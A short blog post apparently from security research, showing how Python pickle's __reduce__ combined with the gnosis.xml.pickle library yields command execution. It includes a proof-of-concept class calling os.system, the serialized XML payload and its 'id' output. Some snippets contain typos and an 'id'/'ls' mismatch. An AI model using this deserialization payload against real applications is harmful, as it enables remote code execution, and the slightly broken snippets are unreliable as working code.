Exploiting XML Serialization in Python

Java Vulnerabilities
Lately I have been really interested in XML serialization vulnerabilities. There has already been some eye opening research into the vulnerabilities that exist within implementations of Java:
- XStream “Remote Code Execution” exploit on code from “Standard way to serialize and deserialize Objects with XStream”
- More on XStream RCE: SpringMVC WS
A brief summary of the research above is there are serious issues with the blind serialization of XML documents into native objects. I also came across some research on vulnerabilities that exist with using Python’s Pickle module for object serialization.
So my thought was, “How can I combine the two, and are there any Python modules that assist with the serialization of XML to objects?”
I found what seems to be an outdated implementation of this in the Gnosis Utility package. gnosis.xml.pickle – Allows for XML Pickling of Python objects.
First we need to create something to “pickle” into an object:
import os import cPickle import gnosis.xml.pickel class doShell(object): def __reduce__(self): return (os.system,('id',)) obj = cPickle.dumps(doShell())This returns and stores our system command’s object representation. Now we can use Gnosis to load this:
xml = gnosis.xml.dumps(obj)And the output looks something like this:
<?xml version="1.0"?> <!DOCTYPE PyObject SYSTEM "PyObjects.dtd"> <PyObject family="obj" type="builtin_wrapper" class="_EmptyClass"> <attr name="__toplevel__" type="string" value="cposixnsystemnp1n(S'ls'np2ntp3nRp4n." /> </PyObject>From here with simply use Gnosis to consume the XML and use Pickle to load our stored system command object:
result = gnosis.xml.pickle.loads(data) cPickle.loads(result)uid=501(rotlogix)…(truncated)
One of the things I attempted to do is actually take the XML output and load it directly, but I ran into a lot of truncation issues with Pickle, which may or may not have to do with UTF-8.
Still gotta figure that one out… I think some applicable scenarios would be possibly dumping and loading user’s submitted data within a web application using both Pickle and Gnosis.
There weren’t many real world examples that I could find, but regardless you get the picture.
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